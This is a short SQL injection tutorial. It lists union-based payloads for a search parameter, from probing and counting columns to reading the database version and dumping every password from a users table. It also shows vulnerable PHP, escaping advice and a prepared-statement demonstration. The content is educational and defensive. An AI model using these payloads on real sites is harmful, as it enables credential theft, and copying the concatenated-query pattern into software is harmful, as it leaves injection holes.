SQL Injection

SQL Injection – Low

How it works?


Some Commands

Tests to see if the server is vulnerable:
   '&action=search

Checks how many valid columns there are:
   'order by 1,2,3,4,5,6,7-- -&action=search

Checks the version of the MySQL database:
   'union+select+1,@@version,3,4,5,6,7--+-&action=search

Retrieves the passwords from the users table:
   'union+select+1,(SELECT+GROUP_CONCAT(password+SEPARATOR+0x3c62723e)+FROM+users),3,4,5,6,7--+-&action=search

A Useful Tool

A useful tool for website hacking is HackBar.

It only works for Firefox.


Vulnerable Code

$var = $_POST['var'];
mysql_query("SELECT * FROM sometable WHERE id = $var");

How to deal with it.

$var = mysql_real_escape_string($_POST['var']);

Do not build queries by concatenating strings; it's very bad.

PHP comes with many built-in functions, such as addslashes, mysql_escape_string and mysql_real_escape_string.

Some of these functions have flaws and will be obsolete.
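
The alternative to escaping and concatenation is a prepared statement with bound parameters. The following is an added example, not code from the original page: it runs the page's query shape three ways and prints how many rows each returns, showing that escaping does nothing when the value sits in an unquoted numeric position, as in the vulnerable query above. Assumptions: PDO with an in-memory SQLite database stands in for the MySQL server, and the rows in sometable and the input value are constructed for the demonstration.

```php
<?php
// Added example. Assumption: in-memory SQLite via PDO stands in for MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE sometable (id INTEGER, name TEXT)');
$pdo->exec("INSERT INTO sometable (id, name) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

// Constructed input, as it would arrive in $_POST['var'].
$var = '1 OR 1=1';

// 1) Escaping plus concatenation in a numeric context. The input contains no
//    quote characters, so addslashes() returns it unchanged and the OR clause
//    becomes part of the SQL statement.
$escaped = addslashes($var);
$rows = $pdo->query("SELECT * FROM sometable WHERE id = $escaped")
            ->fetchAll(PDO::FETCH_ASSOC);
printf("escaped + concatenated: %d row(s)\n", count($rows));

// 2) Prepared statement. The SQL text is fixed before any input is seen; the
//    input is bound as a single value and is only ever compared against id.
$stmt = $pdo->prepare('SELECT * FROM sometable WHERE id = :id');
$stmt->execute([':id' => $var]);
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
printf("prepared statement:     %d row(s)\n", count($rows));

// 3) Defence in depth: reject anything that is not an integer before the
//    database is involved at all, then still use the prepared statement.
$id = filter_var($var, FILTER_VALIDATE_INT);
if ($id === false) {
    echo "validation:             rejected, id must be an integer\n";
} else {
    $stmt->execute([':id' => $id]);
    printf("validated lookup:       %d row(s)\n", count($stmt->fetchAll()));
}
```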

Demonstration Of The Attack

